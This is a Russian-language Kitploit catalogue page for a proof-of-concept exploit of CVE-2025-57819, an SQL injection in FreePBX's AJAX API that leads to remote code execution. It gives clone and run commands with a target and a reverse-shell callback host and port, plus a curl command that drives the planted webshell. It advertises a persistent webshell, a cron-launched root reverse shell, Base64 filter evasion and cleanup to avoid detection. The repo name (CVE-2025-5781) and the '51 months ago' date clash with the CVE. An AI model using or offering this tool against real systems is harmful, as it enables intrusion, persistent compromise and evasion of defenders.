Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-5781 — Эксплойт proof-of-concept для CVE-2025-57819 в FreePBX: SQL-инъекция в AJAX API для выполнения произвольного PHP, создания постоянного веб-шелла и запуска reverse shell. | Kitploit
Инструменты/GitHubGitHub/jasonbernier/cve-2025-5781
Механизмы персистентностиЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияКомандование и УправлениеРазработка Полезной Нагрузки
GitHubjasonbernier/cve-2025-5781

CVE-2025-5781

Эксплойт proof-of-concept для CVE-2025-57819 в FreePBX: SQL-инъекция в AJAX API для выполнения произвольного PHP, создания постоянного веб-шелла и запуска reverse shell.

Репозиторий
51 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт FreePBX CVE-2025-57819

Описание

Этот скрипт эксплуатирует уязвимость в версиях FreePBX до 16.0.26.0 (CVE-2025-57819), позволяющую удалённым злоумышленникам выполнять произвольный PHP-код из-за недостатка SQL-инъекции в конечной точке AJAX API. Эксплойт создаёт как веб-шелл, так и автоматически запускаемый реверс-шелл.

Детали уязвимости

  • CVE: CVE-2025-57819
  • Затронутые версии: FreePBX < 16.0.26.0
  • Воздействие: удалённое выполнение кода (RCE)
  • Вектор: SQL-инъекция в AJAX API (/admin/ajax.php)

Возможности

  • Создаёт постоянный веб-шелл по адресу /pbxshell.php
  • Настраивает автоматически запускаемый реверс-шелл через cron-задачу
  • Использует полезные нагрузки, закодированные в Base64, для обхода фильтров
  • Автоматическая очистка cron-задач после выполнения

Требования

  • Python 3.x
  • библиотека
requests
  • Netcat (для прослушивания реверс-шелла)
  • Установка

    root@kitploit:~
    git clone https://github.com/jasonbernier/CVE-2025-5781.git
    cd CVE-2025-5781
    pip install requests
    

    Использование

    root@kitploit:~
    python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT
    

    Параметры:

    • -H HOST: целевой экземпляр FreePBX (например, https://freepbx.example.com)
    • -lhost LHOST: ваш IP-адрес для обратного вызова реверс-шелла
    • -lport LPORT: порт для подключения реверс-шелла

    Пример:

    root@kitploit:~
    python3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444
    

    Порядок работы эксплойта

    1. Отправляет полезную нагрузку SQL-инъекции для создания веб-шелла
    2. Ожидает создания веб-шелла (~2 минуты)
    3. Создаёт автоматически запускаемый реверс-шелл через cron-задачу
    4. Запускает прослушиватель netcat на указанном порту

    Использование веб-шелла

    После успешной эксплуатации получите доступ к веб-шеллу через:

    root@kitploit:~
    curl -X GET "http://TARGET/pbxshell.php?cmd=id"
    

    Очистка

    Эксплойт автоматически удаляет cron-задачи после выполнения, чтобы избежать обнаружения.

    Примечания

    • Скрипт использует -- для комментирования оставшегося SQL-синтаксиса
    • Все команды выполняются с привилегиями root
    • Требуется доступ на запись к каталогу /var/www/html/

    Ссылки

    • CVE-2025-57819
    • Бюллетень безопасности FreePBX
    Скачать инструмент